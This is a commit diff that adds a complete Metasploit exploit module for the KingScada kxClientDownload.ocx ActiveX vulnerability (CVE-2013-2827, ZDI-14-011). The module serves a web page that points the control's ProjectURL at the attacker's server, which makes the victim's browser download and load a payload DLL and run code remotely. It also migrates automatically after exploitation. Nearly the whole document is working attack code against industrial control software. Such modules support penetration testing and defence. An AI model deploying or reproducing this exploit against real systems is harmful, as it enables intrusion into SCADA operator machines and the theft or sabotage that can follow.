Add module for ZDI-14-011

modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb

@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'KingScada kxClientDownload.ocx ActiveX Remote Code Execution',
+      'Description'    => %q{
+        This module abuses the kxClientDownload.ocx distributed with WellingTech KingScada.
+        The ProjectURL property can be abused to download and load arbitrary DLLs from
+        arbitrary locations, leading to arbitrary code execution, because of a dangerous
+        usage of LoadLibrary. Due to the nature of the vulnerability, this module will work
+        only when there isn't Protected Mode.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Andrea Micalizzi',  # aka rgod original discovery
+          'juan vazquez'       # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2013-2827'],
+          ['OSVDB', '102135'],
+          ['BID', '64941'],
+          ['ZDI', '14-011'],
+          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01']
+        ],
+      'DefaultOptions' =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+        },
+      'BrowserRequirements' =>
+        {
+          :source      => /script|headers/i,
+          :os_name     => Msf::OperatingSystems::WINDOWS,
+          :ua_name     => /MSIE|KXCLIE/i
+        },
+      'Payload'        =>
+        {
+          'Space'           => 2048,
+          'StackAdjustment' => -3500,
+          'DisableNopes'    => true
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 14 2014'))
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Requested: #{request.uri}")
+
+    if request.uri =~ /\/libs\/.*\.dll/
+      print_good("Sending DLL payload")
+      send_response(cli,
+        generate_payload_dll(:code => get_payload(cli, target_info)),
+        'Content-Type' => 'application/octet-stream'
+      )
+      return
+    elsif request.uri =~ /\/libs\//
+      print_status("Sending not found")
+      send_not_found(cli)
+      return
+    end
+
+    content = <<-EOS
+<html>
+<body>
+<object classid='clsid:1A90B808-6EEF-40FF-A94C-D7C43C847A9F' id='#{rand_text_alpha(10 + rand(10))}'>
+<param name="ProjectURL" value="#{get_module_uri}"></param>
+</object>
+</body>
+</html>
+    EOS
+
+    print_status("Sending #{self.name}")
+    send_response_html(cli, content)
+  end
+
+end